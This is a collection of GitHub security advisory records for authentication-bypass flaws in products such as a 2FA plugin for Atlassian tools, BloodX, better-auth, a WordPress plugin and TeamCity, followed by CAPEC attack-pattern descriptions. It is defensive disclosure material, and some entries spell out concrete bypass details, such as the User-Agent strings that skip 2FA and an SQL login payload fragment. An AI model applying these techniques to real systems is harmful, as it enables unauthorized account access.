"modified": "2022-11-10T12:01:11Z",
"published": "2022-11-09T12:00:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27510"
},
{
"type": "WEB",
"url": "https://support.citrix.com/article/CTX463706/citrix-gateway-and-citrix-adc-security-bulletin-for-cve202227510-cve202227513-and-cve202227516"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-XFW8-8P99-43JW
Vulnerability from github – Published: 2026-06-16 12:32 – Updated: 2026-06-21 09:30syracom AG Secure Login (2FA) for Atlassian Jira, Confluence, and Bitbucket 3.4.0.x contains an authentication bypass vulnerability. An attacker with valid credentials for a user account can bypass the two-factor authentication flow by sending HTTP requests with a crafted User-Agent header containing specific strings such as AtlassianMobileApp or JIRA. When such a User-Agent is present, the plugin does not enforce the configured 2FA checks for protected web resources. Successful exploitation allows the attacker to access the affected Atlassian application as the compromised user without completing 2FA. If the compromised account has administrative privileges, the attacker can access administrative functionality and may disable the 2FA plugin or make arbitrary administrative changes. The issue is fixed in version 3.5.0.0.
{
"affected": [],
"aliases": [
"CVE-2026-12225"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-16T12:16:26Z",
"severity": "HIGH"
},
"details": "syracom AG Secure Login (2FA) for Atlassian Jira, Confluence, and Bitbucket 3.4.0.x contains an authentication bypass vulnerability. An attacker with valid credentials for a user account can bypass the two-factor authentication flow by sending HTTP requests with a crafted User-Agent header containing specific strings such as AtlassianMobileApp or JIRA. When such a User-Agent is present, the plugin does not enforce the configured 2FA checks for protected web resources. Successful exploitation allows the attacker to access the affected Atlassian application as the compromised user without completing 2FA. If the compromised account has administrative privileges, the attacker can access administrative functionality and may disable the 2FA plugin or make arbitrary administrative changes. The issue is fixed in version 3.5.0.0.",
"id": "GHSA-xfw8-8p99-43jw",
"modified": "2026-06-21T09:30:49Z",
"published": "2026-06-16T12:32:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12225"
},
{
"type": "WEB",
"url": "https://marketplace.atlassian.com/apps/1214491/secure-login-2fa-for-confluence"
},
{
"type": "WEB",
"url": "https://r.sec-consult.com/syracom"
},
{
"type": "WEB",
"url": "https://syracom-bee.atlassian.net/wiki/spaces/SL/pages/4193255427/2026-05-11+-+Secure+Login+security+advisory+-+Broken+Access+Control"
},
{
"type": "WEB",
"url": "https://syracom-bee.atlassian.net/wiki/spaces/SL/pages/4230217729/Mobile+app+login+does+not+work+with+Secure+Login"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2026/Jun/16"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-XFXM-P3PX-PHFR
Vulnerability from github – Published: 2026-02-11 21:30 – Updated: 2026-02-11 21:30BloodX 1.0 contains an authentication bypass vulnerability in login.php that allows attackers to access the dashboard without valid credentials. Attackers can exploit the vulnerability by sending a crafted payload with '=''or' parameters to bypass login authentication and gain unauthorized access.
{
"affected": [],
"aliases": [
"CVE-2020-37156"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-11T21:16:08Z",
"severity": "MODERATE"
},
"details": "BloodX 1.0 contains an authentication bypass vulnerability in login.php that allows attackers to access the dashboard without valid credentials. Attackers can exploit the vulnerability by sending a crafted payload with \u0027=\u0027\u0027or\u0027 parameters to bypass login authentication and gain unauthorized access.",
"id": "GHSA-xfxm-p3px-phfr",
"modified": "2026-02-11T21:30:40Z",
"published": "2026-02-11T21:30:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37156"
},
{
"type": "WEB",
"url": "https://github.com/diveshlunker/BloodX"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/47842"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/bloodx-authentication-bypass"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-XG6X-H9C9-2M83
Vulnerability from github – Published: 2026-04-03 03:29 – Updated: 2026-04-03 03:29Summary
Under certain configurations, sessions may be considered valid before two-factor authentication (2FA) is fully completed. This can allow access to authenticated routes without verifying the second factor.
Description
When two-factor authentication is enabled, the authentication flow correctly identifies users who require additional verification and defers full authentication until the second factor is completed.
However, when session.cookieCache is enabled, the session generated during the initial sign-in step may be cached as valid prior to 2FA verification. Subsequent session lookups may then return this cached session without re-evaluating the 2FA requirement.
This results in a situation where session validity can be established before all authentication constraints are satisfied.
Impact
An attacker (or user) with valid primary credentials may gain access to protected application routes without completing the required second authentication factor.
Any application using better-auth with both two-factor authentication and session cookie caching enabled may be affected.
Mitigation
- Upgrade to a version of
better-auththat includes the fix for this issue. - Ensure that session caching does not treat sessions as fully authenticated until all required authentication steps, including 2FA, are completed.
- As a temporary workaround, disable
session.cookieCachewhen using two-factor authentication.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "better-auth"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-03T03:29:59Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\n\nUnder certain configurations, sessions may be considered valid before two-factor authentication (2FA) is fully completed. This can allow access to authenticated routes without verifying the second factor.\n\n---\n\n### Description\n\nWhen two-factor authentication is enabled, the authentication flow correctly identifies users who require additional verification and defers full authentication until the second factor is completed.\n\nHowever, when `session.cookieCache` is enabled, the session generated during the initial sign-in step may be cached as valid **prior to 2FA verification**. Subsequent session lookups may then return this cached session without re-evaluating the 2FA requirement.\n\nThis results in a situation where session validity can be established before all authentication constraints are satisfied.\n\n---\n\n### Impact\n\nAn attacker (or user) with valid primary credentials may gain access to protected application routes without completing the required second authentication factor.\n\nAny application using `better-auth` with both two-factor authentication and session cookie caching enabled may be affected.\n\n---\n\n### Mitigation\n\n* Upgrade to a version of `better-auth` that includes the fix for this issue.\n* Ensure that session caching does not treat sessions as fully authenticated until all required authentication steps, including 2FA, are completed.\n* As a temporary workaround, disable `session.cookieCache` when using two-factor authentication.",
"id": "GHSA-xg6x-h9c9-2m83",
"modified": "2026-04-03T03:29:59Z",
"published": "2026-04-03T03:29:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/better-auth/better-auth/security/advisories/GHSA-xg6x-h9c9-2m83"
},
{
"type": "PACKAGE",
"url": "https://github.com/better-auth/better-auth"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Better Auth Has Two-Factor Authentication Bypass via Premature Session Caching (session.cookieCache)"
}
GHSA-XGV9-3CM6-QCCQ
Vulnerability from github – Published: 2024-07-12 12:30 – Updated: 2026-04-08 18:33The MStore API – Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 4.14.7. This is due to insufficient verification on the 'phone' parameter of the 'firebase_sms_login' and 'firebase_sms_login_v2' functions. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email address or phone number. Additionally, if a new email address is supplied, a new user account is created with the default role, even if registration is disabled.
{
"affected": [],
"aliases": [
"CVE-2024-6328"
],
"database_specific": {
"cwe_ids": [
"CWE-288",
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-07-12T11:15:11Z",
"severity": "CRITICAL"
},
"details": "The MStore API \u2013 Create Native Android \u0026 iOS Apps On The Cloud plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 4.14.7. This is due to insufficient verification on the \u0027phone\u0027 parameter of the \u0027firebase_sms_login\u0027 and \u0027firebase_sms_login_v2\u0027 functions. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email address or phone number. Additionally, if a new email address is supplied, a new user account is created with the default role, even if registration is disabled.",
"id": "GHSA-xgv9-3cm6-qccq",
"modified": "2026-04-08T18:33:32Z",
"published": "2024-07-12T12:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6328"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/mstore-api/trunk/controllers/flutter-user.php#L699"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/mstore-api/trunk/controllers/flutter-user.php#L714"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3115231"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/17d8e2e9-5e3f-433b-be1a-6ea765eba547?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-XH94-49WQ-7H2H
Vulnerability from github – Published: 2024-03-04 18:30 – Updated: 2025-10-22 00:32In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible
{
"affected": [],
"aliases": [
"CVE-2024-27198"
],
"database_specific": {
"cwe_ids": [
"CWE-288"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-04T18:15:09Z",
"severity": "CRITICAL"
},
"details": "In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible",
"id": "GHSA-xh94-49wq-7h2h",
"modified": "2025-10-22T00:32:59Z",
"published": "2024-03-04T18:30:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27198"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-27198"
},
{
"type": "WEB",
"url": "https://www.darkreading.com/cyberattacks-data-breaches/jetbrains-teamcity-mass-exploitation-underway-rogue-accounts-thrive"
},
{
"type": "WEB",
"url": "https://www.jetbrains.com/privacy-security/issues-fixed"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Funnel all access through a single choke point to simplify how users can access a resource. For every access, perform a check to determine if the user has permissions to access the resource.
CAPEC-127: Directory Indexing
An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.
CAPEC-665: Exploitation of Thunderbolt Protection Flaws
An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.